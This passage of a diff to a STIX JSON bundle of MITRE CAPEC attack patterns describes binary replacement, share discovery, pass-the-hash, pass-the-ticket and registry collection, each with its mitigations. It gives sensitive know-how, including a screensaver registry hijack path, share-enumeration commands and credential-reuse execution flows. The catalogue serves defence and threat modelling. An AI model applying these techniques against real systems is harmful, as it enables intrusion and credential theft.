executed at higher system permission levels. A variation of this pattern is to discover self-extracting installation packages that unpack binaries to directories with weak file permissions which it does not clean up appropriately. 
These binaries can be replaced by malware, which can then be executed.", + "external_references": [ + { + "external_id": "CAPEC-642", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/642.html" + }, + { + "external_id": "CWE-732", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/732.html" + }, + { + "description": "Server Software Component: Terminal Services DLL", + "external_id": "T1505.005", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1505/005" + }, + { + "description": "Compromise Client Software Binary", + "external_id": "T1554", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1554" + }, + { + "description": "Hijack Execution Flow:Executable Installer File Permissions Weakness", + "external_id": "T1574.005", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1574/005" + }, + { + "description": "Binary planting", + "source_name": "OWASP Attacks", + "url": "https://owasp.org/www-community/attacks/Binary_planting" + } + ], + "id": "attack-pattern--15e6b769-4cbd-4c39-b774-b45673fd55de", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Replace Binaries", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--9ad2c2eb-9939-4590-9683-2e789692d262" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "The installer for a previous version of Firefox would use a DLL maliciously placed in the default download directory instead of the existing DLL located elsewhere, probably due to DLL hijacking. This DLL would be run with administrator privileges if the installer has those privileges.", + "By default, the Windows screensaver application SCRNSAVE.exe leverages the scrnsave.scr Portable Executable (PE) file in C:\\Windows\\system32\\. 
This value is set in the registry at HKEY_CURRENT_USER\\Control Panel\\Desktop, which can be modified by an adversary to instead point to a malicious program. This program would then run any time the SCRNSAVE.exe program is activated and with administrator privileges. An adversary may additionally modify other registry values within the same location to set the SCRNSAVE.exe program to run more frequently." + ], + "x_capec_prerequisites": [ + "The attacker must be able to place the malicious binary on the target machine." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2018-05-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Insure that binaries commonly used by the system have the correct file permissions. Set operating system policies that restrict privilege elevation of non-Administrators. Use auditing tools to observe changes to system services.", + "id": "course-of-action--d9181e23-1afd-428e-a52a-e276bea7a05c", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-642-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2018-05-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--85cbecfa-a889-485b-8231-630bdae5ed86", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--d9181e23-1afd-428e-a52a-e276bea7a05c", + "target_ref": "attack-pattern--15e6b769-4cbd-4c39-b774-b45673fd55de", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2018-07-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary discovers 
connections between systems by exploiting the target system's standard practice of revealing them in searchable, common areas. Through the identification of shared folders/drives between systems, the adversary may further their goals of locating and collecting sensitive information/files, or map potential routes for lateral movement within the network.", + "external_references": [ + { + "external_id": "CAPEC-643", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/643.html" + }, + { + "external_id": "CWE-267", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/267.html" + }, + { + "external_id": "CWE-200", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/200.html" + }, + { + "description": "Network Share Discovery", + "external_id": "T1135", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1135" + } + ], + "id": "attack-pattern--9d08b257-08f6-42e3-ad7e-41aaf07789a1", + "modified": "2021-06-24T00:00:00.000Z", + "name": "Identify Shared Files/Directories on System", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_can_precede_refs": [ + "attack-pattern--f2654def-b86d-4ddb-888f-de6b50a103a2", + "attack-pattern--191fbdab-d3b3-4ffd-8829-51331c20eaa7", + "attack-pattern--f8533ce1-5f23-4660-8f70-1a05af2c70d3" + ], + "x_capec_child_of_refs": [ + "attack-pattern--fd114e53-fdc0-4eef-8254-40ef0d4ea482" + ], + "x_capec_consequences": { + "Confidentiality": [ + "Read Data (The adversary is potentially able to identify the location of sensitive information or lateral pathways through the network.)" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "The adversary must have obtained logical access to the system by some means (e.g., via obtained credentials or planting malware on the system)." 
+ ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack." + ], + "x_capec_skills_required": { + "Low": "Once the adversary has logical access (which can potentially require high knowledge and skill level), the adversary needs only the capability and facility to navigate the system through the OS graphical user interface or the command line. The adversary, or their malware, can simply employ a set of commands that search for shared drives on the system (e.g., net view \\\\remote system or net share)." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2018-07-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Identify unnecessary system utilities or potentially malicious software that may contain functionality to identify network share information, and audit and/or block them by using allowlist tools.", + "id": "course-of-action--60e5229d-6c9b-4ea1-a862-7a6797b8c070", + "modified": "2021-06-24T00:00:00.000Z", + "name": "coa-643-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2018-07-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--877214d8-d718-4bc4-9edf-9b6d4d5bad4a", + "modified": "2021-06-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--60e5229d-6c9b-4ea1-a862-7a6797b8c070", + "target_ref": "attack-pattern--9d08b257-08f6-42e3-ad7e-41aaf07789a1", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2018-07-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary obtains 
(i.e. steals or purchases) legitimate Windows domain credential hash values to access systems within the domain that leverage the Lan Man (LM) and/or NT Lan Man (NTLM) authentication protocols.", + "external_references": [ + { + "external_id": "CAPEC-644", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/644.html" + }, + { + "external_id": "CWE-522", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/522.html" + }, + { + "external_id": "CWE-836", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/836.html" + }, + { + "external_id": "CWE-308", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/308.html" + }, + { + "external_id": "CWE-294", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/294.html" + }, + { + "external_id": "CWE-308", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/308.html" + }, + { + "description": "Use Alternate Authentication Material:Pass The Hash", + "external_id": "T1550.002", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1550/002" + }, + { + "description": "Dan Goodin, Attackers can use Zoom to steal users’ Windows credentials with no warning, 2020--04---01, Ars Technica", + "external_id": "REF-575", + "source_name": "reference_from_CAPEC", + "url": "https://arstechnica.com/information-technology/2020/04/unpatched-zoom-bug-lets-attackers-steal-windows-credentials-with-no-warning/" + }, + { + "description": "Mor Levi, Assaf Dahan, Amit Serper, Operation Soft Cell: A Worldwide Campaign Against Telecommunications Providers, 2019--06---25, CyberReason", + "external_id": "REF-580", + "source_name": "reference_from_CAPEC", + "url": "https://www.cybereason.com/blog/operation-soft-cell-a-worldwide-campaign-against-telecommunications-providers" + }, + { + "description": "Mitigating Pass-the-Hash and Other Credential Theft v2, Microsoft Corporation", + "external_id": "REF-581", + 
"source_name": "reference_from_CAPEC", + "url": "https://docs.microsoft.com/en-us/previous-versions/dn785092(v=msdn.10)?redirectedfrom=MSDN" + }, + { + "description": "How Pass-the-Hash works, Microsoft Corporation", + "external_id": "REF-582", + "source_name": "reference_from_CAPEC", + "url": "https://docs.microsoft.com/en-us/previous-versions/dn785092(v=msdn.10)?redirectedfrom=MSDN" + }, + { + "description": "Bashar Ewaida, Pass-the-hash attacks: Tools and Mitigation, 2010--02---23, The SANS Institute", + "external_id": "REF-583", + "source_name": "reference_from_CAPEC", + "url": "https://www.sans.org/reading-room/whitepapers/testing/paper/33283" + } + ], + "id": "attack-pattern--056a463d-6303-438e-a43f-992cee52fb95", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Use of Captured Hashes (Pass The Hash)", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_can_precede_refs": [ + "attack-pattern--22802ed6-ddc6-4da7-b6be-60b10d26198b", + "attack-pattern--f8533ce1-5f23-4660-8f70-1a05af2c70d3", + "attack-pattern--2c74d7f3-ccb4-4aea-b7fc-8a4da900ec80", + "attack-pattern--191fbdab-d3b3-4ffd-8829-51331c20eaa7" + ], + "x_capec_child_of_refs": [ + "attack-pattern--2618d0a4-06d0-4bde-8271-2df61ed8297a" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authentication": [ + "Gain Privileges" + ], + "Authorization": [ + "Read Data" + ], + "Confidentiality": [ + "Gain Privileges", + "Read Data" + ], + "Integrity": [ + "Modify Data" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "Adversaries exploited the Zoom video conferencing application during the 2020 COVID-19 pandemic to exfiltrate Windows domain credential hash value pairs from a target system. The attack entailed sending Universal Naming Convention (UNC) paths within the Zoom chat window of an unprotected Zoom call. 
If the victim clicked on the link, their Windows usernames and the corresponding Net-NTLM-v2 hashes were sent to the address contained in the link. The adversary was then able to infiltrate and laterally move within the Windows domain by passing the acquired credentials to shared network resources. This further provided adversaries with access to Outlook servers and network storage devices. [REF-575]", + "Operation Soft Cell, which has been underway since at least 2012, leveraged a modified Mimikatz that dumped NTLM hashes. The acquired hashes were then used to authenticate to other systems within the network via Pass The Hash attacks. [REF-580]" + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Acquire known Windows credential hash value pairs: The adversary must obtain known Windows credential hash value pairs of accounts that exist on the domain.

  2. Techniques
    An adversary purchases breached Windows credential hash value pairs from the dark web.
    An adversary conducts a sniffing attack to steal Windows credential hash value pairs as they are transmitted.
    An adversary gains access to a Windows domain system/files and exfiltrates Windows credential hash value pairs.
    An adversary examines outward-facing configuration and properties files to discover hardcoded Windows credential hash value pairs.

Experiment

  1. Attempt domain authentication: Try each Windows credential hash value pair until the target grants access.

  2. Techniques
    Manually or automatically enter each Windows credential hash value pair through the target's interface.

Exploit

  1. Impersonate: An adversary can use successful experiments or authentications to impersonate an authorized user or system, or to laterally move within the domain

  2. Spoofing: Malicious data can be injected into the target system or into other systems on the domain. The adversary can also pose as a legitimate domain user to perform social engineering attacks.

  3. Data Exfiltration: The adversary can obtain sensitive data contained within domain systems or applications.

", + "x_capec_extended_description": "\n When authenticating via LM or NTLM, an authenticating account's plaintext credentials are not required by the protocols for successful authentication. Instead, the hashed credentials are used to determine if an authentication attempt is valid. If an adversary can obtain an account's hashed credentials, the hash values can then be passed to a system or service to authenticate, without needing to brute-force the hashes to obtain their cleartext values. Successful Pass The Hash attacks result in the adversary fully authenticating as the targeted account, which can further allow the adversary to laterally move within the network, impersonate a legitimate user, and/or download/install malware to systems within the domain. This technique can be performed against any operating system that leverages the LM or NTLM protocols even if the operating system is not Windows-based, since these systems/accounts may still authenticate to a Windows domain.\n ", + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "The system/application is connected to the Windows domain.", + "The system/application leverages the Lan Man (LM) and/or NT Lan Man (NTLM) authentication protocols.", + "The adversary possesses known Windows credential hash value pairs that exist on the target domain." + ], + "x_capec_resources_required": [ + "A list of known Window credential hash value pairs for the targeted domain." + ], + "x_capec_skills_required": { + "Low": "Once an adversary obtains a known Windows credential hash value pair, leveraging it is trivial." 
+ }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2018-07-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Prevent the use of Lan Man and NT Lan Man authentication on severs and apply patch KB2871997 to Windows 7 and higher systems.", + "id": "course-of-action--30748f93-76e1-4493-b028-a09a3ae0fe12", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-644-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2018-07-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--fbe2baa0-43b4-4f18-8464-37c77c73232d", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--30748f93-76e1-4493-b028-a09a3ae0fe12", + "target_ref": "attack-pattern--056a463d-6303-438e-a43f-992cee52fb95", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2018-07-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--ee496b22-cfdc-468f-9798-52b53cce0d3b", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--b8f274c3-95ed-4968-afdc-6a8a87a6fb19", + "target_ref": "attack-pattern--056a463d-6303-438e-a43f-992cee52fb95", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2018-07-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--885bfaa4-7ef5-4cd8-b4b3-eeaa867bc6d9", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": 
[ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--ab6c4df3-7bf9-4fdd-8c2a-9055c0aea441", + "target_ref": "attack-pattern--056a463d-6303-438e-a43f-992cee52fb95", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2018-07-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--5c5bf1ff-d38b-4163-b8d6-d921aed35652", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--93ed0e66-1693-44b2-b416-bee8db1ad4c2", + "target_ref": "attack-pattern--056a463d-6303-438e-a43f-992cee52fb95", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2018-07-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Leverage system penetration testing and other defense in depth methods to determine vulnerable systems within a domain.", + "id": "course-of-action--dd700183-d761-44fa-ac56-b6a20cc2cb3c", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-644-4", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2018-07-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--0df6edf6-1157-43d2-8e50-4b6184d75a60", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--dd700183-d761-44fa-ac56-b6a20cc2cb3c", + "target_ref": "attack-pattern--056a463d-6303-438e-a43f-992cee52fb95", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2018-07-31T00:00:00.000Z", + 
"created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary uses stolen Kerberos tickets to access systems/resources that leverage the Kerberos authentication protocol. The Kerberos authentication protocol centers around a ticketing system which is used to request/grant access to services and to then access the requested services. An adversary can obtain any one of these tickets (e.g. Service Ticket, Ticket Granting Ticket, Silver Ticket, or Golden Ticket) to authenticate to a system/resource without needing the account's credentials. Depending on the ticket obtained, the adversary may be able to access a particular resource or generate TGTs for any account within an Active Directory Domain.", + "external_references": [ + { + "external_id": "CAPEC-645", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/645.html" + }, + { + "external_id": "CWE-522", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/522.html" + }, + { + "external_id": "CWE-294", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/294.html" + }, + { + "external_id": "CWE-308", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/308.html" + }, + { + "description": "Use Alternate Authentication Material:Pass The Ticket", + "external_id": "T1550.003", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1550/003" + }, + { + "description": "BRONZE BUTLER Targets Japanese Enterprises, 2017--10---12, Secureworks® Counter Threat Unit™ Threat Intelligence", + "external_id": "REF-584", + "source_name": "reference_from_CAPEC", + "url": "https://www.secureworks.com/research/bronze-butler-targets-japanese-businesses" + } + ], + "id": "attack-pattern--05740120-81ef-4224-9805-2f0b54d1111f", + "modified": "2020-07-30T00:00:00.000Z", + "name": "Use of Captured Tickets (Pass The Ticket)", + "object_marking_refs": [ + 
"marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_can_precede_refs": [ + "attack-pattern--22802ed6-ddc6-4da7-b6be-60b10d26198b" + ], + "x_capec_child_of_refs": [ + "attack-pattern--755bb5ac-2eee-4e54-9864-92812666120c" + ], + "x_capec_consequences": { + "Integrity": [ + "Gain Privileges" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "Bronze Butler (also known as Tick), has been shown to leverage forged Kerberos Ticket Granting Tickets (TGTs) and Ticket Granting Service (TGS) tickets to maintain administrative access on a number of systems. [REF-584]" + ], + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "The adversary needs physical access to the victim system.", + "The use of a third-party credential harvesting tool." + ], + "x_capec_skills_required": { + "High": "The adversary uses a third-party tool to obtain the necessary tickets to execute the attack.", + "Low": "Determine if Kerberos authentication is used on the server." 
+ }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2018-07-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Reset the built-in KRBTGT account password twice to invalidate the existence of any current Golden Tickets and any tickets derived from them.", + "id": "course-of-action--cc52780c-b04c-4940-a2d6-0498907ce5cf", + "modified": "2020-07-30T00:00:00.000Z", + "name": "coa-645-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2018-07-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--5b6333f5-1f2a-4b5f-94e2-17a344115ffb", + "modified": "2020-07-30T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--cc52780c-b04c-4940-a2d6-0498907ce5cf", + "target_ref": "attack-pattern--05740120-81ef-4224-9805-2f0b54d1111f", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2018-07-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--b8766158-fd84-4765-94da-1c65d865c83b", + "modified": "2020-07-30T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--0257f904-bcb7-445e-9ef7-f9d294e49f67", + "target_ref": "attack-pattern--05740120-81ef-4224-9805-2f0b54d1111f", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2018-07-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Adversaries may attempt to obtain information about attached peripheral devices and components 
connected to a computer system. Examples may include discovering the presence of iOS devices by searching for backups, analyzing the Windows registry to determine what USB devices have been connected, or infecting a victim system with malware to report when a USB device has been connected. This may allow the adversary to gain additional insight about the system or network environment, which may be useful in constructing further attacks.", + "external_references": [ + { + "external_id": "CAPEC-646", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/646.html" + }, + { + "external_id": "CWE-200", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/200.html" + }, + { + "description": "Peripheral Device Discovery", + "external_id": "T1120", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1120" + } + ], + "id": "attack-pattern--658d6220-f15c-44fb-8690-1d14088ed637", + "modified": "2020-07-30T00:00:00.000Z", + "name": "Peripheral Footprinting", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_can_follow_refs": [ + "attack-pattern--c8c9dfbe-7a40-4041-84ff-89942878a2f4" + ], + "x_capec_child_of_refs": [ + "attack-pattern--87b0d2df-b246-4bf9-aee8-4912e2fa1a30" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "The adversary needs either physical or remote access to the victim system." + ], + "x_capec_skills_required": { + "Medium": "If analyzing the Windows registry, the adversary must understand the registry structure to know where to look for devices." 
+ }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2018-07-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--d9f6ac50-d71a-415a-a9f3-6b159c887206", + "modified": "2020-07-30T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--a2404315-1d87-4e47-a8e4-c6b2cfe457d8", + "target_ref": "attack-pattern--658d6220-f15c-44fb-8690-1d14088ed637", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2018-05-15T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary exploits a weakness in authorization to gather system-specific data and sensitive information within a registry (e.g., Windows Registry, Mac plist). These contain information about the system configuration, software, operating system, and security. 
The adversary can leverage information gathered in order to carry out further attacks.", + "external_references": [ + { + "external_id": "CAPEC-647", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/647.html" + }, + { + "external_id": "CWE-285", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/285.html" + }, + { + "description": "Data from Local System", + "external_id": "T1005", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1005" + }, + { + "description": "Query Registry", + "external_id": "T1012", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1012" + }, + { + "description": "Unsecured Credentials: Credentials in Registry", + "external_id": "T1552.002", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1552/002" + } + ], + "id": "attack-pattern--ad242ccf-3578-4787-937c-22eb0ede3fb6", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Collect Data from Registries", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--797f4b4e-371a-4d06-9e98-5cccb8a7ebc1" + ], + "x_capec_consequences": { + "Confidentiality": [ + "Read Data (The adversary is able to read sensitive information about the system in the registry.)" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Gain logical access to system: An adversary must first gain logical access to the system it wants to gather registry information from,

  2. Techniques
    Obtain user account credentials and access the system
    Plant malware on the system that will give remote logical access to the adversary

Experiment

  1. Determine if the permissions are correct: Once logical access is gained, an adversary will determine if they have the proper permissions, or are authorized, to view registry information. If they do not, they will need to escalate privileges on the system through other means

  2. Peruse registry for information: Once an adversary has access to a registry, they will gather all system-specific data and sensitive information that they deem useful.

Exploit

  1. Follow-up attack: Use any information or weaknesses found to carry out a follow-up attack

", + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "The adversary must have obtained logical access to the system by some means (e.g., via obtained credentials or planting malware on the system).", + "The adversary must have capability to navigate the operating system to peruse the registry." + ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack." + ], + "x_capec_skills_required": { + "Low": "Once the adversary has logical access (which can potentially require high knowledge and skill level), the adversary needs only the capability and facility to navigate the system through the OS graphical user interface or the command line." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2018-05-15T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--46c95866-35f0-4eb3-8236-3cf76d28c354", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--9c745fa6-97fd-4aa7-830c-2522e1df5ea6", + "target_ref": "attack-pattern--ad242ccf-3578-4787-937c-22eb0ede3fb6", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2018-05-15T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Employ robust identification and audit/blocking via using an allowlist of applications on your system. 
Unnecessary applications, utilities, and configurations will have a presence in the system registry that can be leveraged by an adversary through this attack pattern.", + "id": "course-of-action--b20b8831-79c4-401b-9767-4c506d59c2d9", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-647-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2018-05-15T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--df86fcb3-a484-4707-a8c7-d61b784214bb", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--b20b8831-79c4-401b-9767-4c506d59c2d9", + "target_ref": "attack-pattern--ad242ccf-3578-4787-937c-22eb0ede3fb6", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2018-07-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary gathers sensitive information by exploiting the system's screen capture functionality. Through screenshots, the adversary aims to see what happens on the screen over the course of an operation. 
